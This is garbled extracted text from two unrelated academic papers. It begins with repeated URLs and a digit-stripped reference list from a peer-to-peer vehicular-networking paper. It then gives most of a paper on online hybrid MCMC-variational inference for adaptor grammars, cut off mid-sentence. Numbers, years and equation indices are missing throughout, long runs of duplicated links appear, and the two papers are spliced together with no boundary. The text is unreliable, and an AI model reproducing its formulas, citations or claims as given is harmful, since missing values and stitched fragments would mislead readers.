http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://mailman.isi.edu/pipermail/ns-developers/ -january/ .html http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://www.nsnam.org http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. for smartphone-based vehicular networks. in: ieee workshop on user mobility and vehicular networks. bonn, germany. qureshi a, carlisle j, guttag j. . tavarua: video streaming with wwan striping. in: acm multimedia. acm. rybicki j, scheuermann b, kiess w, lochert c, fallahi p, mauve m. . challenge: peers on wheels—a road to new traffic information systems. in: th annual acm int.l conference on mobile computing and networking (mobicom). new york, new york, usa. santa j, moragon a, gomez-skarmeta af. . experimental evaluation of a novel vehicular communication paradigm based on cellular networks. in: ieee intelligent vehicles symposium. eindhoven, netherlands. seskar i, marie s, holtzman j, wasserman j. . rate of location area updates in cellular systems. in: ieee vehicular technology conference (vtc ’ ). denver, colorado, usa. shinkawa t, terauchi t, kitani t, shibata n, yasumoto k, ito m, higashino t. . a technique for information sharing using inter-vehicle communication with message ferrying. in: ieee int.’l conference on mobile data management (mdm ’ ). nara, japan. sip peer. . sip peer. available at http://code.google.com/p/sip peer. stojmenovic i. . simulations in wireless sensor and ad hoc networks: matching and advancing models, metrics, and solutions. ieee communications magazine ( ): – doi . /mcom. . . sun microsystems, inc. . jxta technology: creating connected communities. in: white paper. santa clara: sun microsystems. tonguz o, wisitpongphan n, bai f, mudalige p, sadekar v. . broadcasting in vanet. in: workshop on vehicular ad hoc networks (move’ ). montreal, canada. trieber m, hennecke a, helbing d. . congested traffic states in empirical observations and microscopic simulations. physical review e ( ): – doi . /physreve. . . vakulenko a. circles intersection library for matlab. available at http://www.mathworks.com/ matlabcentral/fileexchange/ . wegener a, hellbruck h, fischer s, schmidt c, fekete s. . autocast: an adaptive data dissemination protocol fro traffic information systems. in: th ieee vehicular technology conference (vtc ’ ). dublin, ireland. wi-fi alliance. . wi-fi direct standard. available at http://www.wi-fi.org/wi-fi direct.php. xiang q, chen x, kong l, rao l, liu x. . data preference matters: a new perspective of safety data dissemination in vehicular ad hoc networks. in: ieee infocom. ieee. xu h, barth m. . an adaptive dissemination mechanism form inter-vehicle communication-based decentralized traffic information system. in: th int’l ieee conference on intelligent transportation systems (itcs ’ ). toronto, canada. yan t, zhang w, wang g. . dove: data dissemination to a desired number of receivers in vanet. ieee transactions on vehicular technology ( ): – doi . /tvt. . . zhao j, cao g. . vadd: vehicle-assisted data delivery in vehicular ad hoc networks. ieee transaction on vehicular technology ( ): – doi . /tvt. . . zhou b, xu k, gerla m. . group and swarm mobility models for ad hoc network scenarios using virtual tracks. in: ieee military communications conference (milcom). monterey, california, usa. picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://code.google.com/p/sip peer http://dx.doi.org/ . /mcom. . http://dx.doi.org/ . /physreve. . http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.mathworks.com/matlabcentral/fileexchange/ http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://www.wi-fi.org/wi-fi_direct.php http://dx.doi.org/ . /tvt. . http://dx.doi.org/ . /tvt. . http://dx.doi.org/ . /peerj-cs. d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications introduction related work v v approaches v i approaches distributed geographic table d v system mobility model performance evaluation dgt-based proactive localization d v performance evaluation conclusions references online adaptor grammars with hybrid inference ke zhai computer science and umiacs university of maryland college park, md usa zhaike@cs.umd.edu jordan boyd-graber computer science university of colorado boulder, co usa jordan.boyd.graber@colorado.edu shay b. cohen school of informatics university of edinburgh edinburgh, scotland, uk scohen@inf.ed.ac.uk abstract adaptor grammars are a flexible, powerful formalism for defining nonparametric, un- supervised models of grammar productions. this flexibility comes at the cost of expensive inference. we address the difficulty of infer- ence through an online algorithm which uses a hybrid of markov chain monte carlo and variational inference. we show that this in- ference strategy improves scalability without sacrificing performance on unsupervised word segmentation and topic modeling tasks. introduction nonparametric bayesian models are effective tools to discover latent structure in data (müller and quin- tana, ). these models have had great success in text analysis, especially syntax (shindo et al., ). nonparametric distributions provide support over a countably infinite long-tailed distributions common in natural language (goldwater et al., ). we focus on adaptor grammars (johnson et al., ), syntactic nonparametric models based on probabilistic context-free grammars. adaptor gram- mars weaken the strong statistical independence as- sumptions pcfgs make (section ). the weaker statistical independence assumptions that adaptor grammars make come at the cost of ex- pensive inference. adaptor grammars are not alone in this trade-off. for example, nonparametric exten- sions of topic models (teh et al., ) have substan- tially more expensive inference than their parametric counterparts (yao et al., ). a common approach to address this compu- tational bottleneck is through variational infer- ence (wainwright and jordan, ). one of the advantages of variational inference is that it can be easily parallelized (nallapati et al., ) or trans- formed into an online algorithm (hoffman et al., ), which often converges in fewer iterations than batch variational inference. past variational inference techniques for adap- tor grammars assume a preprocessing step that looks at all available data to establish the support of these nonparametric distributions (cohen et al., ). thus, these past approaches are not directly amenable to online inference. markov chain monte carlo (mcmc) inference, an alternative to variational inference, does not have this disadvantage. mcmc is easier to implement, and it discovers the support of nonparametric mod- els during inference rather than assuming it a priori. we apply stochastic hybrid inference (mimno et al., ) to adaptor grammars to get the best of both worlds. we interleave mcmc inference inside vari- ational inference. this preserves the scalability of variational inference while adding the sparse statis- tics and improved exploration mcmc provides. our inference algorithm for adaptor grammars starts with a variational algorithm similar to cohen et al. ( ) and adds hybrid sampling within varia- tional inference (section ). this obviates the need for expensive preprocessing and is a necessary step to create an online algorithm for adaptor grammars. our online extension (section ) processes exam- ples in small batches taken from a stream of data. as data arrive, the algorithm dynamically extends the underlying approximate posterior distributions as more data are observed. this makes the algo- rithm flexible, scalable, and amenable to datasets that cannot be examined exhaustively because of their size—e.g., terabytes of social media data ap- pear every second—or their nature—e.g., speech ac- quisition, where a language learner is limited to the bandwidth of the human perceptual system and can- not acquire data in a monolithic batch (börschinger and johnson, ). we show our approach’s scalability and effective- ness by applying our inference framework in sec- tion on two tasks: unsupervised word segmenta- tion and infinite-vocabulary topic modeling. background in this section, we review probabilistic context-free grammars and adaptor grammars. . probabilistic context-free grammars probabilistic context-free grammars (pcfg) de- fine probability distributions over derivations of a context-free grammar. we define a pcfg g to be a tuple 〈w ,n,r,s,θ〉: a set of terminals w , a set of nonterminals n, productions r, start sym- bol s ∈ n and a vector of rule probabilities θ. the rules that rewrite nonterminal c is r(c). for a more complete description of pcfgs, see manning and schütze ( ). pcfgs typically use nonterminals with a syntactic interpretation. a sequence of terminals (the yield) is generated by recursively rewriting nonterminals as sequences of child symbols (either a nonterminal or a symbol). this builds a hierarchical phrase-tree structure for every yield. for example, a nonterminal vp represents a verb phrase, which probabilistically rewrites into a se- quence of nonterminals v, n (corresponding to verb and noun) using the production rule vp → v n. both nonterminals can be further rewritten. each nonterminal has a multinomial distribution over ex- pansions; for example, a multinomial for nonter- minal n would rewrite as “cake”, with probability θn→cake = . . rewriting terminates when the derivation has reached a terminal symbol such as “cake” (which does not rewrite). while pcfgs are used both in the supervised set- ting and in the unsupervised setting, in this paper we assume an unsupervised setting, in which only terminals are observed. our goal is to predict the underlying phrase-structure tree. . adaptor grammars pcfgs assume that the rewriting operations are in- dependent given the nonterminal. this context- freeness assumption often is too strong for modeling natural language. adaptor grammars break this independence as- sumption by transforming a pcfg’s distribution over algorithm generative process : for nonterminals c ∈ n, draw rule probabilities θc ∼ dir(αc) for pcfg g. : for adapted nonterminal c in c , . . . ,c|m| do : draw grammaton hc ∼ pygem(ac,bc,gc) according to equation , where gc is defined by the pcfg rules r. : for i ∈ { , . . . ,d}, generate a phrase-structure tree ts,i using the pcfg rules r(e) at non-adapted nonterminal e and the grammatons hc at adapted nonterminals c. : the yields of trees t , . . . , td are observations x , . . . ,xd. trees gc rooted at nonterminal c into a richer distri- bution hc over the trees headed by a nonterminal c, which is often referred to as the grammaton. a pitman-yor adaptor grammar (pyag) forms the adapted tree distributions hc using a pitman-yor process (pitman and yor, , py), a generalization of the dirichlet process (ferguson, , dp). a draw hc ≡ (πc,zc) is formed by the stick break- ing process (sudderth and jordan, , pygem) parametrized by scale parameter a, discount factor b, and base distribution gc: π′k ∼beta( − b,a + kb), zk ∼gc, πk ≡π′k ∏k− j= ( −π ′ j), h ≡ ∑ k πkδzk. ( ) intuitively, the distribution hc is a discrete recon- struction of the atoms sampled from gc—hence, reweights gc. grammaton hc assigns non-zero stick-breaking weights π to a countably infinite number of parse trees z. we describe learning these grammatons in section . more formally, a pyag is a quintuple a = 〈g,m,a,b,α〉 with: a pcfg g; a set of adapted nonterminals m ⊆ n; pitman-yor process param- eters ac,bc at each adaptor c ∈ m and dirichlet parameters αc for each nonterminal c ∈ n. we also assume an order on the adapted nonterminals, c , . . . ,c|m| such that cj is not reachable from ci in a derivation if j > i. algorithm describes the generative process of an adaptor grammar on a set of d observed sen- tences x , . . . ,xd. adaptor grammars, in their general form, do not have to use the pitman-yor process but have only been used with the pitman-yor process. this is possible because we assume that recursive nonter- minals are not adapted. given a pyag a, the joint probability for a set of sentences x and its collection of trees t is p(x,t ,π,θ,z|a) = ∏ c∈m p(πc|ac,bc)p(zc|gc) · ∏ c∈n p(θc|αc) ∏ xd∈x p(xd, td|θ,π,z), where xd and td represent the dth observed string and its corresponding parse. the multinomial pcfg parameter θc is drawn from a dirichlet distribution at nonterminal c ∈ n. at each adapted nontermi- nal c ∈ m, the stick-breaking weights πc are drawn from a pygem (equation ). each weight has an as- sociated atom zc,i from base distribution gc, a sub- tree rooted at c. the probability p(xd, td |θ,π,z) is the pcfg likelihood of yield xd with parse tree td. adaptor grammars require a base pcfg such that it does not have recursive adapted nonterminals, i.e., there cannot be a path in a derivation from a given adapted nonterminal to a second appearance of that adapted nonterminal. hybrid variational-mcmc inference discovering the latent variables of the model—trees, adapted probabilities, and pcfg rules—is a problem of posterior inference given observed data. previ- ous approaches use mcmc (johnson et al., ) or variational inference (cohen et al., ). mcmc discovers the support of nonparametric models during the inference, but does not scale to larger datasets (due to tight coupling of variables). variational inference, however, is inherently paral- lel and easily amendable to online inference, but re- quires preprocessing to discover the adapted produc- tions. we combine the best of both worlds and pro- pose a hybrid variational-mcmc inference algorithm for adaptor grammars. variational inference posits a variational distribu- tion over the latent variables in the model; this in turn induces an “evidence lower bound” (elbo, l) as a function of a variational distribution q, a lower bound on the marginal log-likelihood. variational inference optimizes this objective function with re- spect to the parameters that define q. in this section, we derive coordinate-ascent up- dates for these variational parameters. a key math- ematical component is taking expectations with re- spect to the variational distribution q. we strategi- cally use mcmc sampling to compute the expecta- tion of q over parse trees z. instead of explicitly computing the variational distribution for all param- eters, one can sample from it. this produces a sparse approximation of the variational distribution, which improves both scalability and performance. sparse distributions are easier to store and transmit in im- plementations, which improves scalability. mimno et al. ( ) also show that sparse representations improve performance. moreover, because it can flexibly adjust its support, it is a necessary prereq- uisite to online inference (section ). . variational lower bound we posit a mean-field variational distribution: q(π,θ,t |γ,ν,φ) = ∏ c∈m ∏∞ i= q(π ′ c,i|ν c,i,ν c,i) · ∏ c∈n q(θc|γc) ∏ xd∈x q(td|φd), ( ) where π′c,i is drawn from a variational beta distri- bution parameterized by ν c,i,ν c,i; and θc is from a variational dirichlet prior γc ∈ r |r(c)| + . index i ranges over a possibly infinite number of adapted rules. the parse for the dth observation, td is mod- eled by a multinomial φd, where φd,i is the proba- bility generating the ith phrase-structure tree td,i. the variational distribution over latent variables induces the following elbo on the likelihood: l(z,π,θ,t ,d; a,b,α) = h[q(θ,π,t )] + ∑ c∈n eq[log p(θc|αc)] ( ) + ∑ c∈m ∑∞ i= eq[log p(π ′ c,i|ac,bc)] + ∑ c∈m ∑∞ i= eq[log p(zc,i |π,θ)] + ∑ xd∈x eq[log p(xd, td |π,θ,z)], where h[•] is the entropy function. to make this lower bound tractable, we truncate the distribution over π to a finite set (blei and jor- dan, ) for each adapted nonterminal c ∈ m, i.e., π′c,kc ≡ for some index kc. because the atom weights πk are deterministically defined by equa- tion , this implies that πc,i is zero beyond index kc. each weight πc,i is associated with an atom zc,i, a subtree rooted at c. we call the ordered set of zc,i the truncated nonterminal grammaton (tng ). each adapted nonterminal c ∈ m has its own tngc. the ith subtree in tngc is denoted tngc(i). in the rest of this section, we describe approxi- mate inference to maximize l. the most impor- tant update is φd,i, which we update using stochastic mcmc inference (section . ). past variational ap- proaches for adaptor grammars (cohen et al., ) rely on a preprocessing step and heuristics to define a static tng . in contrast, our model dynamically discovers trees. the tng grows as the model sees more data, allowing online updates (section ). the remaining variational parameters are opti- mized using expected counts of adaptor grammar rules. these expected counts are described in sec- tion . , and the variational updates for the vari- ational parameters excluding φd,i are described in section . . . stochastic mcmc inference each observation xd has an associated variational multinomial distribution φd over trees td that can yield observation xd with probability φd,i. hold- ing all other variational parameters fixed, the coordinate-ascent update (mimno et al., ; bishop, ) for φd,i is φd,i ∝ exp{e ¬φd q [log p(td,i|xd,π,θ,z)]}, ( ) where φd,i is the probability generating the ith phrase-structure tree td,i and e ¬φd q [•] is the expec- tation with respect to the variational distribution q, excluding the value of φd. instead of computing this expectation explicitly, we turn to stochastic variational inference (mimno et al., ; hoffman et al., ) to sample from this distribution. this produces a set of sampled trees σd ≡ {σd, , . . . ,σd,k}. from this set of trees we can approximate our variational distribution over trees φ using the empirical distribution σd, i.e., φd,i ∝ i[σd,j = td,i,∀σd,j ∈ σd]. ( ) this leads to a sparse approximation of variational distribution φ. previous inference strategies (johnson et al., ; börschinger and johnson, ) for adaptor grammars have used sampling. the adaptor gram- mar inference methods use an approximate pcfg to emulate the marginalized pitman-yor distributions in our experiments, we use ten samples. at each nonterminal. given this approximate pcfg, we can then sample a derivation z for string x from the possible trees (johnson et al., ). sampling requires a derived pcfg g′ that approx- imates the distribution over tree derivations condi- tioned on a yield. it includes the original pcfg rules r = {c → β} that define the base distribution and the new adapted productions r′ = {c ⇒ z,z ∈ tngc}. under g′, the probability θ′ of adapted pro- duction c ⇒ z is log θ′c⇒z =   eq[log πc,i], if tngc(i) = z eq[log πc,kc ] + eq[log θc⇒z], otherwise ( ) where kc is the truncation level of tngc and πc,kc represents the left-over stick weights in the stick- breaking process for adaptor c ∈ m. θc⇒z repre- sents the probability of generating tree c ⇒ z under the base distribution. see also cohen ( ). the expectation of the pitman-yor multinomial πc,i under the truncated variational stick-breaking distribution is eq[log πa,i] = Ψ(ν a,i) − Ψ(ν a,i + ν a,i) ( ) + ∑i− j= (Ψ(ν a,j) − Ψ(ν a,j + ν a,j)), and the expectation of generating the phrase- structure tree a ⇒ z based on pcfg productions under the variational dirichlet distribution is eq[log θa⇒z] = ∑ c→β∈a⇒z ( Ψ(γc→β) ( ) − Ψ( ∑ c→β′∈rc γc→β′ ) ) where Ψ(•) is the digamma function, and c → β ∈ a ⇒ z represents all pcfg productions in the phrase-structure tree a ⇒ z. this pcfg can compose arbitrary subtrees and thus discover new trees that better describe the data, even if those trees are not part of the tng . this is equivalent to creating a “new table” in mcmc in- ference and provides truncation-free variational up- dates (wang and blei, ) by sampling a unseen subtree with adapted nonterminal c ∈ m at the root. this frees our model from preprocessing to initial- ize truncated grammatons in cohen et al. ( ). this stochastic approach has the advantage of creat- ing sparse distributions (wang and blei, ): few unique trees will be represented. s→ab b→{a,b,c} a→b b a b b grammar seating assignments (nonterminal a) yield parse counts ca b ca s b a new seating b a b b b c h(a →c) += g(b →c) += g(b →a) += ab b aa s b b b a b b b a h(a →a) += g(b →a) += g(b →b) += ba b ba s b a b a b b f(a →b) += g(b →a) += figure : given an adaptor grammar, we sample derivations given an approximate pcfg and show how these affect counts. the sampled derivations can be understood via the chinese restaurant metaphor (johnson et al., ). existing cached rules (elements in the tng ) can be thought of as occupied ta- bles; this happens in the case of the yield “ba”, which increases counts for unadapted rules g and for entries in tnga, f. for the yield “ca”, there is no appropriate entry in the tng , so it must use the base distribution, which corresponds to sitting at a new table. this generates counts for g, as it uses the unadapted rule and for h, which represents entries that could be included in the tng in the future. the final yield, “ab”, shows that even when compatible entries are in the tng , it might still create a new table, changing the underlying base distribution. parallelization as noted in cohen et al. ( ), the inside-outside algorithm dominates the runtime of every iteration, both for sampling and variational inference. however, unlike mcmc, variational in- ference is highly parallelizable and requires fewer synchronizations per iteration (zhai et al., ). in our approach, both inside algorithms and sampling process can be distributed, and those counts can be aggregated afterwards. in our implementation, we use multiple threads to parallelize tree sampling. . calculating expected rule counts for every observation xd, the hybrid approach pro- duces a set of sampled trees, each of which contains three types of productions: adapted rules, original pcfg rules, and potentially adapted rules. the last set is most important, as these are new rules dis- covered by the sampler. these are explained using the chinese restaurant metaphor in figure . the multiset of all adapted productions is m(td,i) and the multiset of non-adapted productions that gener- ate tree td,i is n(td,i). we compute three counts: : f is the expected number of productions within the tng . it is the sum over the probability of a tree td,k times the number of times an adapted production appeared in td,k, fd(a ⇒ za,i) =∑ k ( φd,k |a ⇒ za,i : a ⇒ za,i ∈ m(td,k)|︸ ︷︷ ︸ count of rule a ⇒ za,i in tree td,k ) . : g is the expected counts of pcfg productions r that defines the base distribution of the adaptor grammar, gd(a → β) =∑ k (φd,k |a → β : a → β ∈ n(td,k)|) . : finally, a third set of productions are newly dis- covered by the sampler and not in the tng . these subtrees are rules that could be adapted, with expected counts hd(c ⇒ zc,i) =∑ k (φd,k |c ⇒ zc,i : c ⇒ zc,i /∈ m(td,k)|) . these subtrees—lists of pcfg rules sampled from equation —correspond to adapted pro- ductions not yet present in the tng . . variational updates given the sparse vectors φ sampled from the hybrid mcmc step, we update all variational parameters as γa→β =αa→β + ∑ xd∈x gd(a → β) + ∑ b∈m ∑kb i= n(a → β,zb,i), ν a,i = − ba + ∑ xd∈x fd(a ⇒ za,i) + ∑ b∈m ∑kb k= n(a ⇒ za,i,zb,k), ν a,i =aa + iba + ∑ xd∈x ∑ka j= fd(a ⇒ za,j) + ∑ b∈m ∑kb k= ∑ka j= n(a ⇒ za,j,zb,k), where n(r,t) is the expected number of times pro- duction r is in tree t, estimated during sampling. hyperparameter update we update our pcfg hyperparameter α, pygem hyperparameters a and b as in cohen et al. ( ). online variational inference online inference for probabilistic models requires us to update our posterior distribution as new observa- tions arrive. unlike batch inference algorithms, we do not assume we always have access to the entire dataset. instead, we assume that observations arrive in small groups called minibatches. the advantage of online inference is threefold: a) it does not re- quire retaining the whole dataset in memory; b) each online update is fast; and c) the model usually con- verges faster. all of these make adaptor grammars scalable to larger datasets. our approach is based on the stochastic varia- tional inference for topic models (hoffman et al., ). this inference strategy uses a form of stochastic gradient descent (bottou, ): using the gradient of the elbo, it finds the sufficient statistics necessary to update variational parameters (which are mostly expected counts calculated using the inside-outside algorithm), and interpolates the result with the current model. we assume data arrive in minibatches b (a set of sentences). we accumulate expected counts f̃(l)(a ⇒ za,i) =( − �) · f̃(l− )(a ⇒ za,i) ( ) + � · |x||bl| ∑ xd∈bl fd(a ⇒ za,i), g̃(l)(a → β) =( − �) · g̃(l− )(a → β) ( ) + � · |x||bl| ∑ xd∈bl gd(a → β), with decay factor � ∈ ( , ) to guarantee conver- gence. we set it to � = (τ + l)−κ, where l is the minibatch counter. the decay inertia τ prevents pre- mature convergence, and decay rate κ controls the speed of change in sufficient statistics (hoffman et al., ). we recover batch variational approach when b = d and κ = . the variables f̃(l) and g̃(l) are accumulated suffi- cient statistics of adapted and unadapted productions after processing minibatch bl. they update the ap- proximate gradient. the updates for variational pa- rameters become γa→β =αa→β + g̃ (l)(a → β) ( ) + ∑ b∈m ∑kb i= n(a → β,zb,i), ν a,i = − ba + f̃ (l)(a ⇒ za,i) ( ) + ∑ b∈m ∑kb k= n(a ⇒ za,i,zb,k), ν a,i =aa + iba + ∑ka j= f̃ (l)(a ⇒ za,j) ( ) + ∑ b∈m ∑kb k= ∑ka j= n(a ⇒ za,j,zb,k), where ka is the size of the tng at adaptor a ∈ m. . refining the truncation as we observe more data during inference, our tng s need to change. new rules should be added, useless rules should be removed, and derivations for existing rules should be updated. in this section, we describe heuristics for performing each of these operations. adding productions sampling can identify pro- ductions that are not adapted but were instead drawn from the base distribution. these are candidates for the tng . for every nonterminal a, we add these potentially adapted productions to tnga after each minibatch. the count associated with candidate pro- ductions is now associated with an adapted produc- tion, i.e., the h count contributes to the relevant f count. this mechanism dynamically expands tnga. sorting and removing productions our model does not require a preprocessing step to initialize the tng s, rather, it constructs and expands all tng s on the fly. to prevent the tng from growing unwieldy, we prune tng after every u minibatches. as a re- sult, we need to impose an ordering over all the parse trees in the tng . the underlying pygem distribu- tion implicitly places an ranking over all the atoms according to their corresponding sufficient statis- tics (kurihara et al., ), as shown in equation . it measures the “usefulness” of every adapted pro- duction throughout inference process. in addition to accumulated sufficient statistics, cohen et al. ( ) add a secondary term to discour- age short constituents (mochihashi et al., ). we impose a reward term for longer phrases in addition to f̃ and sort all adapted productions in tnga using the ranking score Λ(a ⇒ za,i) = f̃(l)(a ⇒ za,i) · log(� · |s| + ), where |s| is the number of yields in production a ⇒ za,i. because � decreases each minibatch, the reward for long phrases diminishes. this is similar to an annealed version of cohen et al. ( )—where the reward for long phrases is fixed, see also mochihashi et al. ( ). after sorting, we remove all but the top ka adapted productions. rederiving adapted productions for mcmc in- ference, johnson and goldwater ( ) observe that atoms already associated with a yield may have trees algorithm online inference for adaptor grammars : random initialize all variational parameters. : for minibatch of l = , , . . . do : construct approximate pcfg θ′ of a (equation ). : for input sentence d = , , . . . ,dl do : accumulate inside probabilities from approximate pcfg θ′. : sample phrase-structure trees σ and update the tree distribution φ (equation ). : for every adapted nonterminal c, append adapted pro- ductions to tngc. : accumulate sufficient statistics (equations and ). : update γ, ν , and ν (equations - ). : refine and prune the truncation every u minibatches. that do not explain their yield well. they propose ta- ble label resampling to rederive yields. in our approach this is equivalent to “mutating” some derivations in a tng . after pruning rules ev- ery u minibatches, we perform table label resam- pling for adapted nonterminals from general to spe- cific (i.e., a topological sort). this provides better expected counts n(r,•) for rules used in phrase- structure subtrees. empirically, we find table la- bel resampling only marginally improves the word- segmentation result. initialization our inference begins with random variational dirichlets and empty tng s, which obvi- ates the preprocessing step in cohen et al. ( ). our model constructs and expands all tng s on the fly. it mimics the incremental initialization of john- son and goldwater ( ). algorithm summarizes the pseudo-code of our online approach. . complexity inside and outside calls dominate execution time for adaptor grammar inference. variational ap- proaches compute inside-outside algorithms and es- timate the expected counts for every possible tree derivation (cohen et al., ). for a dataset with d observations, variational inference requires o ( di ) calls to inside-outside algorithm, where i is the number of iterations, typically in the tens. in contrast, mcmc only needs to accumulate in- side probabilities, and then sample a tree deriva- tion (chappelier and rajman, ). the sampling step is negligible in processing time compared to the inside algorithm. mcmc inference requires o ( di ) calls to the inside algorithm—hence every iteration co ll oc at io n sent → colloc sent → colloc sent colloc → words un ig ra m words → word words → word words word → chars chars → char chars → char chars char → ? in fv oc l d a sent → docj j= , , . . . d docj →−j topici i= , , . . . k topici → word word → chars chars → char chars → char chars char → ? table : grammars used in our experiments. the nonterminal char is a non-adapted rule that expands to all characters used in the data, sometimes called pre-terminals. adapted nonter- minals are underlined. for the unigram grammar, only nonter- minal word is adapted; whereas for the collocation grammar, both nonterminals word and colloc are adapted. for the in- fvoc lda grammar, d is the total number of documents and k is the number of topics. therefore, j ranges over { , . . . ,d} and i ranges 